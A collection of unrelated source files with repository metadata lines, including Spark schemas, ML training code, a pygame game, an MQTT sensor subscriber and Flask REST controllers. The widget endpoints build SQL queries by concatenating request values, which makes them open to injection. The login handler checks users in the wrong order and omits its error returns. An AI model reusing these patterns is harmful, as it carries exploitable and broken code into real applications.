domwillcode/home-assistant
| 30,023
|
12777989
|
"""Definition of string used in wiffi json telegrams."""
# units of measurement
WIFFI_UOM_TEMP_CELSIUS = "gradC"
WIFFI_UOM_DEGREE = "grad"
WIFFI_UOM_PERCENT = "%"
WIFFI_UOM_MILLI_BAR = "mb"
WIFFI_UOM_LUX = "lux"
| 1.5
| 2
|
spark_scripts/schema.py
|
ChaithralakshmiS/Insight-DE-Project
| 1
|
12777990
|
<reponame>ChaithralakshmiS/Insight-DE-Project<gh_stars>1-10
from pyspark.sql.types import *
from pyspark.sql.types import StringType
from pyspark.sql import SparkSession
from pyspark.sql import functions as F
from pyspark.sql.types import StringType, DoubleType, IntegerType
import postgres
def get_events_schema():
eventSchema = StructType([
StructField("global_event_id",StringType(),True),
StructField("sql_date",StringType(),True),
StructField("month_year",StringType(),True),
StructField("year",StringType(),True),
StructField("fraction_date",StringType(),True),
StructField("actor1_code",StringType(),True),
StructField("actor1_name",StringType(),True),
StructField("actor1_country_code",StringType(),True),
StructField("actor1_known_group_code",StringType(),True),
StructField("actor1_ethnic_code",StringType(),True),
StructField("actor1_religion1_code",StringType(),True),
StructField("actor1_religion2_code",StringType(),True),
StructField("actor1_type1_code",StringType(),True),
StructField("actor1_type2_code",StringType(),True),
StructField("actor1_type3_code",StringType(),True),
StructField("actor2_code",StringType(),True),
StructField("actor2_name",StringType(),True),
StructField("actor2_country_code",StringType(),True),
StructField("actor2_known_group_code",StringType(),True),
StructField("actor2_ethnic_code",StringType(),True),
StructField("actor2_religion1_code",StringType(),True),
StructField("actor2_religion2_code",StringType(),True),
StructField("actor2_type1_code",StringType(),True),
StructField("actor2_type2_code",StringType(),True),
StructField("actor2_type3_code",StringType(),True),
StructField("is_root_event",StringType(),True),
StructField("event_code",StringType(),True),
StructField("event_base_code",StringType(),True),
StructField("event_root_code",StringType(),True),
StructField("quad_class",StringType(),True),
StructField("goldstein_scale",StringType(),True),
StructField("num_mentions",StringType(),True),
StructField("num_sources",StringType(),True),
StructField("num_articles",StringType(),True),
StructField("avg_tone",StringType(),True),
StructField("actor1_geo_type",StringType(),True),
StructField("actor1_geo_full_name",StringType(),True),
StructField("actor1_geo_country_code",StringType(),True),
StructField("actor1_geo_adm1_code",StringType(),True),
StructField("actor1_geo_adm2_code",StringType(),True),
StructField("actor1_geo_lat",StringType(),True),
StructField("actor1_geo_long",StringType(),True),
StructField("actor1_geo_feature_id",StringType(),True),
StructField("actor2_geo_type",StringType(),True),
StructField("actor2_geo_full_name",StringType(),True),
StructField("actor2_geo_country_code",StringType(),True),
StructField("actor2_geo_adm1_code",StringType(),True),
StructField("actor2_geo_adm2_code",StringType(),True),
StructField("actor2_geo_lat",StringType(),True),
StructField("actor2_geo_long",StringType(),True),
StructField("actor2_geo_feature_id",StringType(),True),
StructField("action_geo_type",StringType(),True),
StructField("action_geo_full_name",StringType(),True),
StructField("action_geo_country_code",StringType(),True),
StructField("action_geo_adm1_code",StringType(),True),
StructField("action_geo_adm2_code",StringType(),True),
StructField("action_geo_lat",StringType(),True),
StructField("action_geo_long",StringType(),True),
StructField("action_geo_feature_id",StringType(),True),
StructField("date_added",StringType(),True),
StructField("source_url",StringType(),True)])
return eventSchema
def transform_events_df(df):
df = df.withColumn("global_event_id", df.global_event_id.cast("LONG"))
df = df.withColumn("event_date", F.to_date(df.sql_date, format="yyyyMMdd"))
df = df.withColumn("actor1_code", df.actor1_code.cast("STRING"))
df = df.withColumn("actor1_name", df.actor1_name.cast("STRING"))
df = df.withColumn("actor1_country_code", df.actor1_country_code.cast("STRING"))
df = df.withColumn("actor1_known_group_code", df.actor1_known_group_code.cast("STRING"))
df = df.withColumn("actor1_type1_code", df.actor1_type1_code.cast("STRING"))
df = df.withColumn("actor1_type2_code", df.actor1_type2_code.cast("STRING"))
df = df.withColumn("actor1_type3_code", df.actor1_type3_code.cast("STRING"))
df = df.withColumn("actor2_code", df.actor2_code.cast("STRING"))
df = df.withColumn("actor2_name", df.actor2_name.cast("STRING"))
df = df.withColumn("actor2_country_code", df.actor2_country_code.cast("STRING"))
df = df.withColumn("actor2_known_group_code", df.actor2_known_group_code.cast("STRING"))
df = df.withColumn("actor2_type1_code", df.actor2_type1_code.cast("STRING"))
df = df.withColumn("actor2_type2_code", df.actor2_type2_code.cast("STRING"))
df = df.withColumn("actor2_type3_code", df.actor2_type3_code.cast("STRING"))
df = df.withColumn("is_root_event", df.is_root_event.cast("INT"))
df = df.withColumn("event_code", df.event_code.cast("STRING"))
df = df.withColumn("event_base_code", df.event_base_code.cast("STRING"))
df = df.withColumn("event_root_code", df.event_root_code.cast("STRING"))
df = df.withColumn("goldstein_scale", df.goldstein_scale.cast("FLOAT"))
df = df.withColumn("num_mentions", df.num_mentions.cast("INT"))
df = df.withColumn("num_sources", df.num_sources.cast("INT"))
df = df.withColumn("num_articles", df.num_articles.cast("INT"))
df = df.withColumn("avg_tone", df.avg_tone.cast("FLOAT"))
df = df.withColumn("source_url", df.source_url.cast("STRING"))
return df
def get_event_mentions_schema():
mentionSchema = StructType([
StructField("global_event_id",StringType(),True),
StructField("event_time_date",StringType(),True),
StructField("mention_time_date",StringType(),True),
StructField("mention_type",StringType(),True),
StructField("mention_source_name",StringType(),True),
StructField("mention_identifier",StringType(),True),
StructField("sentence_id",StringType(),True),
StructField("actor1_char_offset",StringType(),True),
StructField("actor2_char_offset",StringType(),True),
StructField("action_char_offset",StringType(),True),
StructField("in_raw_text",StringType(),True),
StructField("confidence",StringType(),True),
StructField("mention_doc_len",StringType(),True),
StructField("mention_doc_tone",StringType(),True),
StructField("mention_doc_translation_info",StringType(),True),
StructField("extras",StringType(),True)])
return mentionSchema
def transform_event_mentions_df( df):
df = df.withColumn("global_event_id", df.global_event_id.cast("LONG"))
df = df.withColumn("mention_type", df.mention_type.cast("STRING"))
df = df.withColumn("mention_source_name", df.mention_source_name.cast("STRING"))
df = df.withColumn("mention_identifier", df.mention_identifier.cast("STRING"))
df = df.withColumn("actor1_char_offset", df.actor1_char_offset.cast("INT"))
df = df.withColumn("actor2_char_offset", df.actor2_char_offset.cast("INT"))
df = df.withColumn("action_char_offset", df.action_char_offset.cast("INT"))
df = df.withColumn("confidence", df.confidence.cast("FLOAT"))
df = df.withColumn("mention_doc_tone", df.mention_doc_tone.cast("FLOAT"))
return df
def transform_tweeters_df(df):
df = df.withColumn('user_id', df.user_id.cast('LONG'))
df = df.withColumn('user_screen_name', df.user_screen_name.cast('STRING'))
df = df.withColumn('followers_count', df.followers_count.cast('INT'))
df = df.withColumn('friends_count', df.friends_count.cast('INT'))
df = df.withColumn('listed_count', df.listed_count.cast('INT'))
df = df.withColumn('favorite_count', df.favorite_count.cast('INT'))
df = df.withColumn('statuses_count', df.statuses_count.cast('INT'))
df = df.withColumn('user_location', df.user_location.cast('STRING'))
return df
def transform_tweets_df(df):
#df = df.withColumn('created_at',F.to_date(df.created_at, format="yyyyMMdd"))
df = df.withColumn("created_at",F.to_date(df.created_at, "EEE MMM dd HH:mm:ss Z yyyy"))
df = df.withColumn('status_id', df.status_id.cast('LONG'))
df = df.withColumn('user_id', df.user_id.cast('LONG'))
df = df.withColumn('url', df.url.cast('STRING'))
df = df.withColumn('reply_count', df.reply_count.cast('INT'))
df = df.withColumn('retweet_count', df.retweet_count.cast('INT'))
df = df.withColumn('quote_count', df.quote_count.cast('INT'))
df = df.withColumn('favorite_count', df.favorite_count.cast('INT'))
return df
def transform_retweets_df(df):
df = df.withColumn('retweet_status_id', df.retweet_status_id.cast('LONG'))
df = df.withColumn('retweet_src_status_id', df.retweet_src_status_id.cast('LONG'))
return df
def transform_quotes_df(df):
df = df.withColumn('quote_status_id', df.quote_status_id.cast('LONG'))
df = df.withColumn('quote_src_status_id', df.quote_src_status_id.cast('LONG'))
return df
| 2.484375
| 2
|
v602/python/vorbereitung.py
|
chrbeckm/anfaenger-praktikum
| 2
|
12777991
|
<gh_stars>1-10
import numpy as np
import scipy.constants as const
planckh = const.Planck
cspeed = const.speed_of_light
charge = const.elementary_charge
d = 201.4*10**(-12)
ordnung = np.array([29, 29, 30, 32, 35, 37, 38, 40, 41])
ek = np.array([8.048, 8.905, 9.673 ,11.115 ,13.483 ,15.202 ,16.106 ,17.997 ,18.985])
ek = ek * charge * 10**3
rhyd = 13.6
anzahl = 9
theta = np.ones(anzahl)
sigma = np.ones(anzahl)
def ftheta(f):
return np.arcsin((planckh*cspeed)/(2*d*f))*180/np.pi
def fsigma(f, z):
return (z-np.sqrt(f/(rhyd*charge)))
for i in range(anzahl):
theta[i] = ftheta(ek[i])
sigma[i] = fsigma(ek[i], ordnung[i])
np.savetxt('build/vorbereitung.txt', np.column_stack([ordnung, ek/charge, theta, sigma]),
header='ordnung, ek, theta, sigma')
| 2.09375
| 2
|
main.py
|
oliversvane/Classification-With-Laplace-Approximation
| 2
|
12777992
|
<reponame>oliversvane/Classification-With-Laplace-Approximation<gh_stars>1-10
# module load python3/3.8.11
# module load cudnn/v8.2.0.53-prod-cuda-11.3
import warnings
import os
import torch
import torch.distributions as dists
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms, utils
import numpy as np
from netcal.metrics import ECE
from laplace import Laplace
from torch.utils.tensorboard import SummaryWriter
import matplotlib.pyplot as plt
warnings.simplefilter("ignore", UserWarning)
writer = SummaryWriter('runs/fashion_mnist_experiment_1')
#np.random.seed(7777)
#torch.manual_seed(7777)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = True
n_epochs = 1
batch_size_train = 64
batch_size_test = 1
learning_rate = 0.01
momentum = 0.5
log_interval = 10
num_classes=10
#TODO Create better data loader with augmentation
train_loader = torch.utils.data.DataLoader(
datasets.FashionMNIST('./files/', train=True, download=True,
transform=transforms.Compose([
transforms.ToTensor()
])),
batch_size=batch_size_train, shuffle=True)
test_loader = torch.utils.data.DataLoader(
datasets.FashionMNIST('./files/', train=False, download=True,
transform=transforms.Compose([
transforms.ToTensor()
])),
batch_size=batch_size_test, shuffle=True)
targets = torch.cat([y for x, y in test_loader], dim=0).cpu()
class CNN(nn.Module):
def __init__(self):
super(CNN, self).__init__()
self.conv1 = nn.Conv2d(1, 32, 3, 1)
self.conv2 = nn.Conv2d(32, 64, 3, 1)
self.conv3 = nn.Conv2d(64, 32, 5, 1)
self.fc1 = nn.Linear(800, 10)
self.relu = nn.ReLU()
self.maxpool = nn.MaxPool2d(4, 4)
#Definer struktur af netværk
def forward(self,x):
out = nn.Sequential(
self.conv1,
self.relu,
self.conv2,
self.relu,
self.conv3,
self.relu,
self.maxpool,
nn.Flatten(),
nn.Flatten(),
self.fc1)(x)
return out
model = CNN()
#Tensorboard
dataiter = iter(train_loader)
images, labels = dataiter.next()
img_grid = utils.make_grid(images)
writer.add_image('four_fashion_mnist_images', img_grid)
writer.add_graph(model, images)
writer.close()
optimizer = optim.SGD(model.parameters(), lr=learning_rate,
momentum=momentum)
train_losses = []
train_counter = []
test_losses = []
test_counter = [i*len(train_loader.dataset) for i in range(n_epochs + 1)]
def train(epoch):
model.train()
for batch_idx, (data, target) in enumerate(train_loader):
optimizer.zero_grad()
output = model(data)
loss = nn.CrossEntropyLoss()(output, target)
loss.backward()
optimizer.step()
if batch_idx % log_interval == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.item()), end="\r")
train_losses.append(loss.item())
train_counter.append(
(batch_idx*64) + ((epoch-1)*len(train_loader.dataset)))
if not os.path.exists("./models"):
os.mkdir('./models')
torch.save(model.state_dict(), './models/FashionMNIST_plain.pt')
if not os.path.exists("./optimizer"):
os.mkdir('./optimizer')
torch.save(optimizer.state_dict(), './optimizer/optimizer.pth')
def test():
print("Begin pred print")
model.eval()
test_loss = 0
correct = 0
with torch.no_grad():
for data, target in test_loader:
output = model(data)
test_loss += F.nll_loss(output, target, size_average=False).item()
pred = output.data.max(1, keepdim=True)[1]
print(output)
correct += pred.eq(target.data.view_as(pred)).sum()
test_loss /= len(test_loader.dataset)
test_losses.append(test_loss)
print('\nTest set: Avg. loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
test_loss, correct, len(test_loader.dataset),
100. * correct / len(test_loader.dataset)))
for epoch in range(1, n_epochs + 1):
train(epoch)
test()
@torch.no_grad()
def predict(dataloader, model, laplace=False):
py = []
for x, _ in dataloader:
if laplace:
py.append(model(x))
else:
py.append(torch.softmax(model(x), dim=-1))
return torch.cat(py).cpu()
probs_map = predict(test_loader, model, laplace=False)
acc_map = (probs_map.argmax(-1) == targets).float().mean()
ece_map = ECE(bins=10).measure(probs_map.numpy(), targets.numpy())
nll_map = -dists.Categorical(probs_map).log_prob(targets).mean()
print(f'[MAP] Acc.: {acc_map:.1%}; ECE: {ece_map:.1%}; NLL: {nll_map:.3}')
# Laplace
print(1)
la = Laplace(model, 'classification',
subset_of_weights='last_layer',
hessian_structure='diag')
print(2)
la.fit(train_loader)
print(5)
la.optimize_prior_precision(method='marglik')
print(1)
probs_laplace = predict(test_loader, la, laplace=True)
print(3)
acc_laplace = (probs_laplace.argmax(-1) == targets).float().mean()
print(1)
ece_laplace = ECE(bins=10).measure(probs_laplace.numpy(), targets.numpy())
print(1)
nll_laplace = -dists.Categorical(probs_laplace).log_prob(targets).mean()
print(f'[Laplace] Acc.: {acc_laplace:.1%}; ECE: {ece_laplace:.1%}; NLL: {nll_laplace:.3}')
print("All done")
# Use kwags for calibration method specific parameters
def test2(calibration_method=None, **kwargs):
preds = []
labels_oneh = []
correct = 0
model.eval()
print("We did it")
with torch.no_grad():
for data in test_loader:
images, labels = data[0], data[1]
pred = model(images)
if calibration_method:
pred = calibration_method(pred, kwargs)
# Get softmax values for net input and resulting class predictions
sm = nn.Softmax(dim=1)
pred = sm(pred)
_, predicted_cl = torch.max(pred.data, 1)
pred = pred.cpu().detach().numpy()
# Convert labels to one hot encoding
label_oneh = torch.nn.functional.one_hot(labels, num_classes=num_classes)
label_oneh = label_oneh.cpu().detach().numpy()
preds.extend(pred)
labels_oneh.extend(label_oneh)
# Count correctly classified samples for accuracy
correct += sum(predicted_cl == labels).item()
print("We did it")
preds = np.array(preds).flatten()
labels_oneh = np.array(labels_oneh).flatten()
correct_perc = correct / len(test_loader.dataset)
print('Accuracy of the network on the test images: %d %%' % (100 * correct_perc))
print(correct_perc)
return preds, labels_oneh
preds, labels_oneh = test2()
print(labels_oneh)
print(preds)
def calc_bins(preds):
# Assign each prediction to a bin
num_bins = 10
bins = np.linspace(0.1, 1, num_bins)
binned = np.digitize(preds, bins)
# Save the accuracy, confidence and size of each bin
bin_accs = np.zeros(num_bins)
bin_confs = np.zeros(num_bins)
bin_sizes = np.zeros(num_bins)
for bin in range(num_bins):
bin_sizes[bin] = len(preds[binned == bin])
if bin_sizes[bin] > 0:
bin_accs[bin] = (labels_oneh[binned==bin]).sum() / bin_sizes[bin]
bin_confs[bin] = (preds[binned==bin]).sum() / bin_sizes[bin]
return bins, binned, bin_accs, bin_confs, bin_sizes
from visualization.plot import * #TODO FIX PLOTS
def T_scaling(logits, args):
temperature = args.get('temperature', None)
return torch.div(logits, temperature)
temperature = nn.Parameter(torch.ones(1).cpu())
args = {'temperature': temperature}
criterion = nn.CrossEntropyLoss()
# Removing strong_wolfe line search results in jump after 50 epochs
optimizer = optim.LBFGS([temperature], lr=0.001, max_iter=10000, line_search_fn='strong_wolfe')
logits_list = []
labels_list = []
temps = []
losses = []
for i, data in enumerate(test_loader):
images, labels = data[0], data[1]
model.eval()
with torch.no_grad():
logits_list.append(model(images))
labels_list.append(labels)
# Create tensors
logits_list = torch.cat(logits_list).cpu()
labels_list = torch.cat(labels_list).cpu()
def _eval():
loss = criterion(T_scaling(logits_list, args), labels_list)
loss.backward()
temps.append(temperature.item())
losses.append(loss)
return loss
optimizer.step(_eval)
print('Final T_scaling factor: {:.2f}'.format(temperature.item()))
plt.subplot(121)
plt.plot(list(range(len(temps))), temps)
plt.subplot(122)
plt.plot(list(range(len(losses))), losses)
plt.savefig("test.png")
preds_original, _ = test2()
preds_calibrated, _ = test2(T_scaling, temperature=temperature)
draw_reliability_graph(preds_original,"soft_")
draw_reliability_graph(preds_calibrated,"lap_")
| 2.375
| 2
|
pykomposter/lib.py
|
algoravioli/pykomposter
| 0
|
12777993
|
<reponame>algoravioli/pykomposter
import music21
import numpy as np
import pandas as pd
# function definitions
import actions
# behaviours:
import behaviours
# metabehaviours:
import metabehaviours
# microactions
import microactions
class pykomposter:
def __init__(self):
super(pykomposter, self).__init__()
self.outlook = {
"tendency": None, # tendency: how much of stated behaviour is it likely to follow. List: [2ndary behaviour, float] eg. [stochastic, 0.2]
"metabehaviour": None, # how the komposter model decides the actions to take. Reference (Variable): e.g metabehaviour.random
"op_char": dict(), # operational characteristics: dict={} containing time-dependencies, and content-dependencies.
}
# setters
def setTendency(self, tendency_list):
if len(tendency_list) == 2:
if isinstance(tendency_list[0], str):
if isinstance(tendency_list[1], float):
self.outlook["tendency"] = tendency_list
else:
raise RuntimeError(
"ERROR: 2nd argument of tendency needs to be a float."
)
else:
raise RuntimeError(
"ERROR: 1st argument of tendency needs to be a string."
)
else:
raise RuntimeError("ERROR: Tendency list must only contain 2 elements")
def setMetaBehaviour(self, metabehaviour):
self.outlook["metabehaviour"] = metabehaviour
def setOpChar(self, opchardict):
self.outlook["op_char"] = opchardict
##########################
# BEHAVIOUR INTERACTIONS #
##########################
def withBehaviour(self, behaviour, compose, state_transitions=100, cubeDict=None):
# print(f" state = {state_transitions}")
score = compose(
self.outlook["metabehaviour"],
behaviour,
self.outlook["op_char"],
state_transitions,
cubeDict,
)
return score
| 2.59375
| 3
|
Background_Straws.py
|
Zucchi43/Flappy_Turtle
| 0
|
12777994
|
import pygame
size = width, height = 350,500 #Screen Size
class Background(pygame.sprite.Sprite):
def __init__(self, image_file, location):
pygame.sprite.Sprite.__init__(self) #call Sprite initializer
self.image = pygame.image.load(image_file)
self.rect = self.image.get_rect()
self.rect.left, self.rect.top = location
class Straw_class (pygame.sprite.Sprite):
def __init__(self, start_x, start_y, size_x, size_y,inverted):
super().__init__()
self.image = pygame.transform.scale(pygame.image.load('Images/canudo_mal_feito.png'), (size_x,size_y))
if inverted: self.image = pygame.transform.rotozoom(self.image,180,1)
self.rect = self.image.get_rect()
self.rect.move_ip((start_x,start_y))
self.vel = [0, 0]
self.accel = [-4,0]
def update(self):
self.vel[0] = self.accel[0]
self.vel[1] = self.accel[1]
self.rect.move_ip(*self.vel)
| 3
| 3
|
pkg/controllers/auth.py
|
azupatrick0/taskmanagist
| 0
|
12777995
|
from flask import Flask, request, make_response
import re
from app import db, bcrypt
from pkg.models.auth_models import user
from pkg.helpers.authentication import generateToken
class Auth:
def init(self):
pass
def signup(self):
name = request.json['name']
email = request.json['email']
unhashed_password = request.json['password']
password = bcrypt.generate_password_hash(
unhashed_password).decode('utf-8')
if(len(email) < 1):
return make_response({
'status': 400,
'data': {
'message': "Email is requred",
}
}, 400)
elif(len(password) < 6):
return make_response({
'status': 400,
'data': {
'message': "Password must be 6 or more characters",
}
}, 400)
elif(re.search("^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$", email)):
response = user.query.filter_by(email=email).first()
if(response):
return make_response({
'status': 409,
'data': {
'error': 'User already exists'
}
}, 409)
else:
new_user = user(name, email, password)
db.session.add(new_user)
db.session.commit()
auth_user = {
'id': new_user.id,
'name': new_user.name,
'email': new_user.email,
}
return make_response({
'status': 201,
'data': {
'user': {
**auth_user,
'token': generateToken(auth_user)
}
}
}, 201)
else:
# email is not valid
return make_response({
'status': 400,
'data': {
'message': "Email is invalid",
}
}, 400)
def login(self):
email = request.json['email']
unhashed_password = request.json['password']
response = user.query.filter_by(email=email).first()
password = response.password
if(not response):
make_response({
'status': 404,
'data': {
'message': 'User not found',
}
}, 404)
elif(not bcrypt.check_password_hash(password, unhashed_password)):
make_response({
'status': 400,
'data': {
'message': 'Invalid login credentials',
}
}, 400)
else:
auth_user = {
'id': response.id,
'name': response.name,
'email': response.email,
}
return make_response({
'status': 200,
'data': {
'user': {
**auth_user,
'token': generateToken(auth_user)
}
}
}, 200)
auth = Auth()
| 2.96875
| 3
|
Lib/site-packages/wx-3.0-msw/wx/__init__.py
|
jickieduan/python27
| 5
|
12777996
|
<reponame>jickieduan/python27<filename>Lib/site-packages/wx-3.0-msw/wx/__init__.py
#----------------------------------------------------------------------------
# Name: __init__.py
# Purpose: The presence of this file turns this directory into a
# Python package.
#
# Author: <NAME>
#
# Created: 8-Aug-1998
# RCS-ID: $Id$
# Copyright: (c) 1998 by Total Control Software
# Licence: wxWindows license
#----------------------------------------------------------------------------
import __version__
__version__ = __version__.VERSION_STRING
__all__ = [
# Sub-packages
'build',
'lib',
'py',
'tools',
# other modules
'animate',
'aui',
'calendar',
'combo',
'grid',
'html',
'media',
'richtext',
'webkit',
'wizard',
'xrc',
# contribs (need a better way to find these...)
'gizmos',
'glcanvas',
'stc',
]
# Load the package namespace with the core classes and such
from wx._core import *
del wx
if 'wxMSW' in PlatformInfo:
__all__ += ['activex']
# Load up __all__ with all the names of items that should appear to be
# defined in this pacakge so epydoc will document them that way.
import wx._core
__docfilter__ = wx._core.__DocFilter(globals())
__all__ += [name for name in dir(wx._core) if not name.startswith('_')]
#----------------------------------------------------------------------------
| 2.15625
| 2
|
project_generator/tool.py
|
aethaniel/project_generator
| 1
|
12777997
|
# Copyright 2014 0xc0170
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# exporters
from .exporters.iar import IARExporter
from .exporters.coide import CoideExporter
from .exporters.gccarm import MakefileGccArmExporter
from .exporters.uvision import UvisionExporter
from .exporters.eclipse import EclipseGnuARMExporter
# builders
from .builders.iar import IARBuilder
from .builders.gccarm import MakefileGccArmBuilder
from .builders.uvision import UvisionBuilder
EXPORTERS = {
'uvision': UvisionExporter,
'make_gcc_arm': MakefileGccArmExporter,
'iar': IARExporter,
'coide': CoideExporter,
'eclipse_make_gcc_arm': EclipseGnuARMExporter,
}
BUILDERS = {
'uvision': UvisionBuilder,
'make_gcc_arm': MakefileGccArmBuilder,
'iar': IARBuilder,
}
def export(data, tool, env_settings):
""" Invokes tool generator. """
if tool not in EXPORTERS:
raise RuntimeError("Exporter does not support defined tool.")
Exporter = EXPORTERS[tool]
exporter = Exporter()
project_path = exporter.generate(data, env_settings)
return project_path
def build(projects, project_path, tool, env_settings, root):
""" Invokes builder for specificed tool. """
if tool not in BUILDERS:
raise RuntimeError("Builder does not support defined tool.")
Builder = BUILDERS[tool]
builder = Builder()
builder.build(projects, project_path, env_settings, root)
| 1.851563
| 2
|
tests/core/test_project_init.py
|
pypipet/pypipet
| 0
|
12777998
|
<filename>tests/core/test_project_init.py
from unittest.mock import Mock
import pytest
from pypipet.core.project_context import PipetContext
from sqlalchemy.exc import OperationalError
import os
class TestProjectInit:
def test_init_project(self):
ctx = PipetContext()
ctx.start_project('test')
assert ctx.root is not None
def test_start_project(self):
ctx = PipetContext()
ctx.start_project('test')
setting_file = ctx.root + 'setting.yaml'
assert os.path.isfile(setting_file) is not None
ctx.initialize_project(config_file=setting_file)
assert ctx.config is not None
assert ctx.db_config is not None
assert ctx.config.get('file_template') is not None
assert ctx.engine is not None
assert ctx.get_session_maker() is not None
ctx.set_log_level('debug')
assert ctx.log_level is not None
ctx.import_static_data()
| 2.21875
| 2
|
videodatabase.py
|
nsdown/Facebook-Video-Uploader
| 4
|
12777999
|
<filename>videodatabase.py
## this example uses sqlite
#Download sqlite browser app for dealing with your database here:
#http://sqlitebrowser.org/
#from peewee import *
import peewee
db = peewee.SqliteDatabase('VideoUploads.db')
class Video(peewee.Model):
vid_url = peewee.CharField(max_length=4096)
class Meta:
database = db # This model uses the "people.db" database.
def addVideo(vid_url):
vid = Video(vid_url=vid_url)
vid.save()
print "Added video", vid_url
def videoExists(vid_url):
try:
return Video.get(Video.vid_url == vid_url)
except Video.DoesNotExist:
return False
# Only create the tables if they do not exist.
db.create_tables([Video], safe=True)
| 3.34375
| 3
|
bme280_test.py
|
Kuzj/Python_BME280
| 1
|
12778000
|
<gh_stars>1-10
#!/usr/bin/env python
from Adafruit_BME280 import BME280
from time import sleep
DELAY_BETWEEN_SENSORS = 1
SPI_BUS = 0
for j in range(20):
for i in [1,2,3,4,5]:
bme280SensorInstance = BME280(spi_bus=SPI_BUS,spi_dev=i, speed_hz = 13)#, delay_usec = 10000)
if bme280SensorInstance.sample_ok:
print(f'sensor {SPI_BUS}.{i}')
print(f't = {round(bme280SensorInstance.temperature,1)}')
print(f'h = {round(bme280SensorInstance.humidity,1)}')
print(f'p = {round(bme280SensorInstance.pressure,1)}')
sleep(DELAY_BETWEEN_SENSORS)
print('-'*30)
print('+'*30)
| 2.875
| 3
|
src/examples/reference/mousemoved.py
|
agarwalnaimish/pyprocessing
| 3
|
12778001
|
<filename>src/examples/reference/mousemoved.py
from pyprocessing import *
# Move your mouse across the
# image to change the value of the rectangle
value = 0;
def draw():
fill(value);
rect(25, 25, 50, 50);
def mouseMoved():
global value
value = value + 5;
if (value > 255):
value = 0;
run()
| 3.140625
| 3
|
app/controllers/user/widget.py
|
meongbego/IOT_ADRINI
| 1
|
12778002
|
<gh_stars>1-10
from flask_restful import Resource, reqparse, fields
from app.helpers.rest import *
from app.helpers.memcache import *
from app.models import model as db
from app import db as dbq
from app.middlewares.auth import login_required, get_jwt_identity
class WidgetResource(Resource):
@login_required
def get(self):
obj_userdata = list()
id_userdata = str(get_jwt_identity())
column = db.get_columns('v_widget')
try:
results = list()
query = "select * from v_widget where id_userdata='"+id_userdata+"'"
dbq.execute(query)
rows = dbq.fetchall()
for row in rows:
print(row)
results.append(dict(zip(column, row)))
except Exception as e:
return response(401, message=str(e))
else:
for i in results :
data = {
"id_widget": str(i['id_widget']),
"nm_widget" : i['nm_widget'],
"id_channels": str(i['id_channels'])
}
obj_userdata.append(data)
return response(200, data=obj_userdata)
class WidgetResourceById(Resource):
@login_required
def get(self, id_widget):
obj_userdata = list()
id_userdata = str(get_jwt_identity())
column = db.get_columns('v_widget')
try:
results = list()
query = "select * from v_widget where id_userdata='"+id_userdata+"' and id_widget='"+id_widget+"'"
dbq.execute(query)
rows = dbq.fetchall()
for row in rows:
print(row)
results.append(dict(zip(column, row)))
except Exception as e:
return response(401, message=str(e))
else:
for i in results :
data = {
"id_widget": str(i['id_widget']),
"nm_widget" : i['nm_widget'],
"id_channels": str(i['id_channels'])
}
obj_userdata.append(data)
return response(200, data=obj_userdata)
class WidgetInsert(Resource):
@login_required
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('nm_widget', type=str, required=True)
parser.add_argument('id_channels', type=str, required=True)
args = parser.parse_args()
data_insert = {
"nm_widget" : args['nm_widget'],
"id_channels" : args['id_channels'],
}
try:
result = db.insert(table="tb_widget", data=data_insert)
except Exception as e:
message = {
"status": False,
"error": str(e)
}
return response(200, message=message)
else:
respon = {
"data": data_insert,
"id" : result
}
return response(200, data=respon)
class WidgetRemove(Resource):
@login_required
def delete(self, id_widget):
try:
db.delete(
table="tb_widget",
field='id_board',
value=id_widget
)
except Exception as e:
message = {
"status": False,
"error": str(e)
}
else:
message = "removing"
finally:
return response(200, message=message)
class WidgetUpdate(Resource):
@login_required
def put(self, id_widget):
parser = reqparse.RequestParser()
parser.add_argument('nm_widget', type=str, required=True)
args = parser.parse_args()
data = {
"where":{
"id_widget": id_widget
},
"data":{
"nm_widget" : args['nm_widget'],
"id_channels" : args['id_channels'],
}
}
try:
db.update("tb_widget", data=data)
except Exception as e:
message = {
"status": False,
"error": str(e)
}
else:
message = {
"status": True,
"data": data
}
finally:
return response(200, message=message)
| 2.4375
| 2
|
python/sub-temp.py
|
robertrongen/smartys-rpi
| 0
|
12778003
|
<reponame>robertrongen/smartys-rpi<gh_stars>0
import time
import datetime
import paho.mqtt.client as mqtt
import fourletterphat as flp
import signal
import buttonshim
# set max temperature
maxtemp = 30
# Define event handlers
def on_connect(mqtt_client, obj, flags, rc):
mqtt_client.subscribe("smartys1/temp")
print("Connected")
def on_message(mqtt_client, obj, msg):
message = msg.payload.decode()
temp = float(message) # + 100
print("Topic: "+msg.topic+" Payload: "+message)
print(datetime.datetime.now())
flp.print_str(message)
flp.show()
# set LED color based on temperature and max temperature
if temp < (maxtemp - 2):
print("green")
buttonshim.set_pixel(0x00, 0xff, 0x00) #GREEN
elif temp > maxtemp:
print("red")
buttonshim.set_pixel(0xff, 0x00, 0x00) #RED
else:
print("yellow")
buttonshim.set_pixel(0xff, 0xff, 0x00) #YELLOW
print("Subscribing to EnviroPhat temperature via MQTT on broker.hivemq.com with topic smartie1/temp (CTRL-C to exit)")
mqtt_client = mqtt.Client("", True, None, mqtt.MQTTv31)
mqtt_client.on_connect = on_connect
mqtt_client.on_message = on_message
mqtt_client.connect("broker.hivemq.com", 1883, 60)
mqtt_client.loop_forever()
| 2.84375
| 3
|
gifts_rest/router.py
|
brjones/gifts_rest
| 0
|
12778004
|
<filename>gifts_rest/router.py
"""
.. See the NOTICE file distributed with this work for additional information
regarding copyright ownership.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
